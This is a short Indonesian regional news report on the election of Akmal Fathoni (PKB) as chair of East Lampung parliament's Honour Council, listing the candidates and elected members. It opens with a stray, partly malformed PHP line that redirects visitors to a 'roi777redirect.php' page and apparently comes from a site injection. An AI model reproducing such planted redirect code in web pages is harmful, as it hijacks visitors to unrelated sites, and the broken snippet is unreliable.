header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Akmal Jadi Ketua BK -
Akmal Jadi Ketua BK

TRANSLAMPUNG.COM, Sukadana-Akmal Fathoni dari Fraksi PKB Lampung Timur terpilih menjadi Ketua Badan Kehormatan (BK) DPRD Kabupaten Lamtim melalui proses pemilihan langsung penghitungan suara oleh para anggota DPRD Lamtim.

Pemilihan tersebut dilakukan saat rapat paripurna pemilihan dan penetapan Badan Kehormatan dan penyampaian perubahan tata tertib serta penyampaian tata tertib beracara badan kehormatan DPRD lamtim. Yang dilaksanakan Diruang sidang DPRD lamtim, pada Rabu (18/1).

Untuk nama-nama calon anggota badan kehormatan ada 8 nama calon untuk dipilih nama-nama tersebut, Joko Pramono dari PDIP, Akmal Fathoni dari PKB, Ismail Jafar dari PKS, Mery Hutasoit dari Nasdem, Azwar Hadi dari Golkar, Purwianto dari Gerindra, Taufik Gani dari Demokrat, dan Hendrik Kurniawan dari PAN.

Dari 8 calon tersebut akan dipilih menjadi 5 orang akan dijadikan anggota badan kehormatan DPRD kabupaten lamtim, dengan melakukan pemilihan langsung perhitungan suara, setelah dilakukan pemungutan suara maka yang terpilih menjadi ketua badan kehormatan DPRD lamtim Akmal Fathoni dari Partai PKB dan wakil nya Taufik Gani dari Partai Demokrat, sementara anggota nya Azwar Hadi dari Partai Golkar, Joko Pramono dari Partai PDIP, Purwianto dari Partai Gerindra.(r9)

News Reporter